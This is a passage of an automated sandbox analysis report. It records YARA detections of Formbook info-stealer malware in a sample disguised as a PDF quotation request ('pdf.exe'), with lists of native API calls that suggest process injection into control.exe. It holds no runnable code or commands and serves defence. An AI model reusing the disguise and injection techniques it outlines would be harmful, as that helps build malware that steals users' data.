          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004181B0 NtCreateFile
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00418260 NtReadFile
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004182E0 NtClose
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00418390 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004182DC NtClose
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A095D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A098A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09820 NtEnumerateKey
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0B040 NtSuspendThread
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A099D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09950 NtQueueApcThread
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09A10 NtQuerySection
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09B00 NtSetValueKey
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A095F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09560 NtWriteFile
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A096D0 NtCreateKey
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09650 NtQueryValueKey
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09760 NtOpenProcess
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A09770 NtSetInformationFile
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A0A770 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9560 NtWriteFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DA770 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047DA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007181B0 NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00718260 NtReadFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007182E0 NtClose
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00718390 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007182DC NtClose
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00408C4B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00408C50
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00402D87
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041BD8E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041C5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B5A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A920A8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DB090
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A928EC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A9E824
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A81002
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009CF900
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A922AE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A7FA2B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009FEBB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A803DA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8DBD2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A92B28
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009EAB40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009D841F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8D466
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A925DD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A92D07
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009C0D20
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A91D55
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A92EF7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_009E6E30
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A8D616
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A91FF1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A9DFCE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A841F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485D466
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04790D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048625DD
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04862D07
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04861D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C2581
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B6E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04862EF7
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485D616
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0486DFCE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04861FF1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048620A8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048628EC
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04851002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0486E824
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AB090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B4120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479F900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048622AE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485DBD2
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048503DA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04862B28
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CEBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00708C50
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00708C4B
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071C5A1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00702D90
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00702D87
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00702FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: String function: 009CB150 appears 45 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0479B150 appears 39 times
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.647856936.000000001F036000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692313752.0000000002625000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692024635.0000000000C4F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
